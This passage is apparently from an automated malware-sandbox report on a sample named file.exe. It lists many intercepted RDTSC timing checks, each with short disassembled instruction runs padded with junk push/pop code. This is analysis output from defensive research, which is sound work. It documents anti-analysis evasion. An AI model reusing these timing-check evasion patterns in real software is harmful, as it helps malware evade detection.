0x00000072 push eax 0x00000073 push eax 0x00000074 push edx 0x00000075 push eax 0x00000076 push edx 0x00000077 jns 00007F7174BA6FD6h 0x0000007d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 648A95 second address: 648A99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 648A99 second address: 648A9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6499E5 second address: 6499E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6513E8 second address: 6513F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 650B44 second address: 650B4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 650B4A second address: 650B6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174BA6FE8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 650B6C second address: 650B70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 650E26 second address: 650E2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 650E2A second address: 650E3A instructions: 0x00000000 rdtsc 0x00000002 jl 00007F7174CEBA86h 0x00000008 jne 00007F7174CEBA86h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 650E3A second address: 650E51 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174BA6FDDh 0x00000007 jo 00007F7174BA6FDEh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 650E51 second address: 650E6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push esi 0x0000000a pushad 0x0000000b popad 0x0000000c je 00007F7174CEBA86h 0x00000012 pop esi 0x00000013 je 00007F7174CEBA92h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E8520 second address: 5E852B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jno 00007F7174BA6FD6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E852B second address: 5E8542 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jnp 00007F7174CEBA8Ah 0x0000000b push edx 0x0000000c pop edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E8542 second address: 5E8546 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E8546 second address: 5E8562 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174CEBA96h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65780D second address: 657811 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 657811 second address: 657815 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 657815 second address: 657833 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F7174BA6FDFh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 657833 second address: 657839 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 657917 second address: 65791B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65791B second address: 657925 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 657925 second address: 65794B instructions: 0x00000000 rdtsc 0x00000002 je 00007F7174BA6FD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d push edx 0x0000000e jmp 00007F7174BA6FDBh 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d push edx 0x0000001e pop edx 0x0000001f popad 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65794B second address: 657964 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7174CEBA94h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65CC68 second address: 65CC6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65CC6D second address: 65CCA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7174CEBA91h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F7174CEBA98h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65D6DC second address: 65D6E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65DAAD second address: 65DAB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65DC20 second address: 65DC29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65DC29 second address: 65DC2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65DC2D second address: 65DC33 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66715C second address: 667167 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 667167 second address: 66716D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66716D second address: 667192 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ecx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F7174CEBA97h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 667192 second address: 667196 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B77B second address: 66B77F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B77F second address: 66B78F instructions: 0x00000000 rdtsc 0x00000002 jno 00007F7174BA6FD6h 0x00000008 js 00007F7174BA6FD6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B78F second address: 66B794 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B92F second address: 66B938 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B938 second address: 66B940 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B940 second address: 66B949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B949 second address: 66B94D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66C1FF second address: 66C205 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66C4AA second address: 66C4B8 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F7174CEBA86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66C4B8 second address: 66C4BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66C4BE second address: 66C4D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174CEBA8Eh 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66C4D2 second address: 66C4D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66C4D8 second address: 66C4DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67161D second address: 67162D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jno 00007F7174BA6FD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 671939 second address: 67193F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 671A85 second address: 671AAE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7174BA6FE1h 0x0000000b pop edi 0x0000000c pushad 0x0000000d jmp 00007F7174BA6FDDh 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 671AAE second address: 671ABB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 671ABB second address: 671ABF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 671BB0 second address: 671BB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 671BB4 second address: 671BDF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174BA6FE4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F7174BA6FDFh 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 671BDF second address: 671BE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 671BE3 second address: 671BE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 671BE9 second address: 671BFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jnc 00007F7174CEBA86h 0x0000000b push edx 0x0000000c pop edx 0x0000000d popad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 671BFA second address: 671C19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7174BA6FE9h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 672443 second address: 672459 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7174CEBA8Fh 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 672459 second address: 67245F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67245F second address: 672465 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 672465 second address: 67246E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67246E second address: 672472 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 672472 second address: 6724BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F7174BA6FE3h 0x0000000d popad 0x0000000e pushad 0x0000000f jmp 00007F7174BA6FDFh 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 jmp 00007F7174BA6FE6h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 676093 second address: 6760AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174CEBA92h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6760AF second address: 6760BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7174BA6FDCh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6760BF second address: 6760E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F7174CEBA98h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6760E0 second address: 6760E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6760E8 second address: 6760EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6760EC second address: 6760F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62ECF2 second address: 62ECFE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62ECFE second address: 62ED02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62EE63 second address: 62EE7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7174CEBA94h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62EE7C second address: 62EEAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7174BA6FE5h 0x00000008 jo 00007F7174BA6FD6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F7174BA6FDCh 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62EF4B second address: 62EF51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62F19B second address: 62F1BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174BA6FE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d push edi 0x0000000e pop edi 0x0000000f pop ecx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62F34B second address: 62F34F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62F95E second address: 62F962 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62FA2F second address: 62FA73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jc 00007F7174CEBA86h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f jmp 00007F7174CEBA8Ah 0x00000014 lea eax, dword ptr [ebp+1248E416h] 0x0000001a call 00007F7174CEBA96h 0x0000001f pushad 0x00000020 cld 0x00000021 popad 0x00000022 pop edx 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 jnl 00007F7174CEBA88h 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62FA73 second address: 62FA79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62FA79 second address: 62FA7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62FA7D second address: 62FAC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push esi 0x0000000e pop eax 0x0000000f mov dword ptr [ebp+122D2A57h], esi 0x00000015 popad 0x00000016 sub dword ptr [ebp+122D260Bh], eax 0x0000001c popad 0x0000001d jbe 00007F7174BA6FECh 0x00000023 lea eax, dword ptr [ebp+1248E3D2h] 0x00000029 mov edi, 49AA9864h 0x0000002e push eax 0x0000002f push esi 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 popad 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62FAC7 second address: 612771 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174CEBA98h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007F7174CEBA88h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 adc dx, EE92h 0x0000002c call dword ptr [ebp+122D2A61h] 0x00000032 push eax 0x00000033 push edx 0x00000034 push esi 0x00000035 jmp 00007F7174CEBA8Eh 0x0000003a pop esi 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 676664 second address: 676668 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 676668 second address: 67666E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67666E second address: 676674 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 676674 second address: 67667B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67667B second address: 6766AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007F7174BA6FDAh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 je 00007F7174BA6FD6h 0x00000016 jmp 00007F7174BA6FE7h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EF01B second address: 5EF03E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7174CEBA98h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d push eax 0x0000000e pop eax 0x0000000f pop ecx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 676A80 second address: 676A9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7174BA6FE6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 676A9C second address: 676AA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 676BEC second address: 676BF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 676BF0 second address: 676C2A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174CEBA95h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F7174CEBA91h 0x0000000f jmp 00007F7174CEBA8Bh 0x00000014 jmp 00007F7174CEBA8Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 676C2A second address: 676C42 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F7174BA6FD6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 jo 00007F7174BA6FD6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 676C42 second address: 676C46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 676C46 second address: 676C62 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174BA6FE8h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 679972 second address: 679998 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F7174CEBA98h 0x0000000a jmp 00007F7174CEBA90h 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jng 00007F7174CEBA86h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 679998 second address: 67999C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
